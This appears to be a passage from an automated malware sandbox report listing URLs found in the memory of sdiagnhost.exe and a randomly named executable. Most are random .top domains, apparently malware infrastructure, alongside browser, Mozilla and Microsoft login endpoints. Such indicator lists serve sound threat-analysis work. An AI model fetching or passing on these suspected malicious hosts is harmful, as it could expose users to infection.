Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.oc7o0.top/ju0/u2ln.doc
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.oc7o0.top/l1qnt/
Source: sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.oc7o0.top/m1o3h5q/
Source: sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.oc7o0.top/mdqixpy/vbk.pptx
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.oc7o0.top/min9s/q9e4xv.doc
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.oc7o0.top/n90o/x6eagu.xlsx
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.oc7o0.top/qii/
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.oc7o0.top/sw1bs0t/qq05.xlsx
Source: sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.oc7o0.top/ute33wk/
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.oc7o0.top/vgjem/z1zm.pptx
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.oc7o0.top/wbb8f/mzs.pptx
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.oc7o0.top/xw7ci9/7fkzpf.docx
Source: EnKifmZDGZ.exe, 00000019.00000002.3736975919.00000000053B5000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.roblesprats.com
Source: EnKifmZDGZ.exe, 00000019.00000002.3736975919.00000000053B5000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.roblesprats.com/e6xn/
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://xorep.s0kfn.top/6d1fct9/xg0p8x.ppt
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://xr3f3p.1cva0.top/n1qm0f/kn1v2.xlsx
Source: sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://0g2i8k.1cva0.top/oq6dhnh/zkfvtu.docx
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://4mt4jb.ko6sc.top/6d92ec/oicfh3p.doc
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://4qghtl.7vp7f.top/zmhkm1/ydumpca.docx
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://5hm.u3gee.top/u4g28a/
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://61t.9nn9e.top/swk75l2/6a0.pptx
Source: sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://6c4.l0yg7.top/nv6hczm/
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://7yx2zl.ss1yp.top/tj0852/x0qd1j.xls
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://85bj22.jsj91.top/2xat4/m98nsm.xls
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://8j3my.stgu5.top/322/
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://8uu.65spz.top/dhqv/
Source: sdiagnhost.exe, 00000015.00000003.1624945463.00000000075B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://api.w.org/
Source: sdiagnhost.exe, 00000015.00000003.1678729235.0000000007E26000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000003.1627416777.0000000007D77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://auvq.gta6p.top/qjeml6z/
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://bah.laoli666.top/ok8x/ttbj2.pptx
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://bzem8k.8kb9n.top/umcbim/nf2.xlsx
Source: sdiagnhost.exe, 00000015.00000003.1624945463.00000000075B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: sdiagnhost.exe, 00000015.00000003.1624945463.00000000075B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: sdiagnhost.exe, 00000015.00000003.1624945463.00000000075B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://cj4x.fehs5.top/n93ovfl/
Source: sdiagnhost.exe, 00000015.00000003.1678729235.0000000007E26000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000003.1627416777.0000000007D77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://crs7b73.7q14w.top/hgwuscj/1z8.doc
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://d17ced.6imvv.top/nutmwu9/mie.docx
Source: sdiagnhost.exe, 00000015.00000003.1624945463.00000000075B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: sdiagnhost.exe, 00000015.00000003.1624945463.00000000075B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: sdiagnhost.exe, 00000015.00000003.1624945463.00000000075B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://eocmn.1osh5.top/lnyp0/
Source: sdiagnhost.exe, 00000015.00000002.3735432410.0000000004E54000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.0000000003314000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.1678819891.000000002FE94000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://error.kangleweb.net/?code=404&vh=vhsa57698
Source: sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://es.wordpress.org/
Source: sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://gmpg.org/xfn/11
Source: sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://gx66ij.em9p9.top/9brce/tw1w.pptx
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://h8w.soaw8.top/mthsy3w/eonaph.doc
Source: sdiagnhost.exe, 00000015.00000003.1678729235.0000000007E26000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000003.1627416777.0000000007D77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://hxb.1cva0.top/hnz76/
Source: EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://hzw.avt.temporary.site/
Source: sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://hzw.avt.temporary.site/#website
Source: sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://hzw.avt.temporary.site/?s=
Source: sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://hzw.avt.temporary.site/wp-content/uploads/2024/01/cropped-sys-computer-logo-1-2-180x180.jpg
Source: sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://hzw.avt.temporary.site/wp-content/uploads/2024/01/cropped-sys-computer-logo-1-2-192x192.jpg
Source: sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://hzw.avt.temporary.site/wp-content/uploads/2024/01/cropped-sys-computer-logo-1-2-270x270.jpg
Source: sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://hzw.avt.temporary.site/wp-content/uploads/2024/01/cropped-sys-computer-logo-1-2-32x32.jpg
Source: EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://hzw.avt.temporary.site/wp-json/
Source: sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://hzw.avt.temporary.site/xmlrpc.php?rsd
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://ijg.oc7o0.top/7a85xk/ua98sk.htm
Source: sdiagnhost.exe, 00000015.00000003.1678729235.0000000007E26000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000003.1627416777.0000000007D77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-launcher-process/launcher-process-failure/1/
Source: sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://kaw.rz93l.top/i9i5z0v/
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://kfpuh5.qclxx.top/v3d9st8/
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://kpl507.bdx91.top/wd1/
Source: sdiagnhost.exe, 00000015.00000002.3732172786.00000000026A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: sdiagnhost.exe, 00000015.00000002.3732172786.00000000026A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: sdiagnhost.exe, 00000015.00000002.3732172786.00000000026A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: sdiagnhost.exe, 00000015.00000002.3732172786.00000000026A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
Source: sdiagnhost.exe, 00000015.00000002.3732172786.00000000026A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033U
Source: sdiagnhost.exe, 00000015.00000002.3732172786.00000000026A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: sdiagnhost.exe, 00000015.00000002.3732172786.00000000026A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: sdiagnhost.exe, 00000015.00000003.1620843904.00000000074E5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css?ver=6.4.3
Source: sdiagnhost.exe, 00000015.00000003.1627416777.0000000007D77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://mozilla.org0/
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://n6x7o74.9vjyq.top/81v/
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://nrbh.gm2mv.top/oc5p/
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://nyzn27r.8k4z2.top/fkh8x/
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://nzh.6imvv.top/lbh/0lr90nc.pptx
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://o93nkcu.qk5qf.top/e1drt6/
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://oha9lk4.7xy0c.top/y96u/
Source: EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-4923976505653650
Source: sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://q5cjh4.7fwhx.top/wd5qx9/
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://ranj.huwd6.top/yh2za/hgvjh3.htm
Source: sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://schema.org
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://sl3gr8c.77bdh.top/qlfc/nbf1.ppt
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://so6k0.y4mlv.top/pk2efa4/6s8v.html
Source: sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://themegrill.com/themes/flash/
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://ua01qg.jsj91.top/b8pu1ee/
Source: sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://ucu1rd5.k831s.top/4t0pwdl/
Source: sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://usqzg3b.s0kfn.top/q7gyjwg/roc.xls
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://v94nhnh.kwx2l.top/e94/ropif.docx
Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://vgm.3i47j.top/3f1d/
Source: sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://wjf.g3vqd.top/9qsld/
